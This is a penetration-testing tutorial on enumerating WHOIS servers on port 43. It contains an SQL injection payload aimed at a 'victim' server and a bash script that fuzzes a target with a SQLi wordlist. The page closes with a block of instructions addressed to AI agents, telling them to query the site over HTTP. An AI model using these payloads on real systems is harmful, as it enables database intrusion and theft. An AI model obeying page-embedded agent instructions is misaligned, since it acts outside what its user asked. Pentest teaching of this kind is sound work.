# WHOIS - Port 43

<details>

<summary>Support VeryLazyTech 🎉</summary>

* Become VeryLazyTech [**member**](https://buymeacoffee.com/verylazytech/membership)**! 🎁**
* **Follow** us on **Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**,** **Github** [**@VeryLazyTech**](https://github.com/verylazytech)**, and Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
* Visit our [**shop** ](https://buymeacoffee.com/verylazytech/extras)for e-books and courses.  📚
* Support us and [**buy me a coffee**](https://buymeacoffee.com/verylazytech)**. ☕**

</details>

## Basic Information

WHOIS is a protocol used to query databases to obtain information about the registrants of various internet resources, including domain names, IP address blocks, and autonomous systems. It operates on a standard port and can be a key tool in information gathering during penetration testing.

**Default port:** 43

```bash
PORT   STATE  SERVICE
43/tcp open   whois
```

## Enumerating WHOIS

To begin with WHOIS enumeration, you can query a WHOIS server to extract all available information about a domain:

```bash
whois -h <HOST> -p <PORT> "domain.tld"
```

Alternatively, you can also use netcat for the same purpose:

```bash
echo "domain.tld" | nc -vn <HOST> <PORT>
```

## Database Information

Often, the WHOIS server responds with the name of the database being queried. This is useful information for further enumeration. It's important to remember that WHOIS services rely on databases to store and retrieve the information, which opens the possibility for SQL injection vulnerabilities.

Using the following query:

```bash
whois -h <Victim_ip> -p 43 "a') or 1=1#"
```

If the WHOIS server is vulnerable, you could extract all the information stored in the underlying database. This makes it essential to consider WHOIS as a potential vector for SQL injection attacks when testing.

Automate script for SQLi:

```
#!/bin/bash

# Variables
HOST="10.10.10.10"  # Change to the target IP
PORT="43"            # Default WHOIS port
WORDLIST="/usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt"  # Path to your SQLi wordlist

# Check if wordlist exists
if [[ ! -f "$WORDLIST" ]]; then
  echo "Wordlist not found!"
  exit 1
fi

# Loop through each payload in the wordlist
while IFS= read -r payload; do
  echo "Testing with payload: $payload"
  
  # Perform the WHOIS request with the current payload
  response=$(whois -h $HOST -p $PORT "$payload")
  
  # Check the response for SQLi indicators (change this according to the specific indicator you want)
  if echo "$response" | grep -qi "syntax error\|unexpected"; then
    echo "Possible SQLi detected with payload: $payload"
    echo "Response: $response"
    echo "-------------------------------------------"
  fi

done < "$WORDLIST"

echo "SQLi test completed."

```

Make the script executable:

```bash
chmod +x whois-sqli-tester.sh
./whois-sqli-tester.sh
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.verylazytech.com/network-pentesting/whois-port-43.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.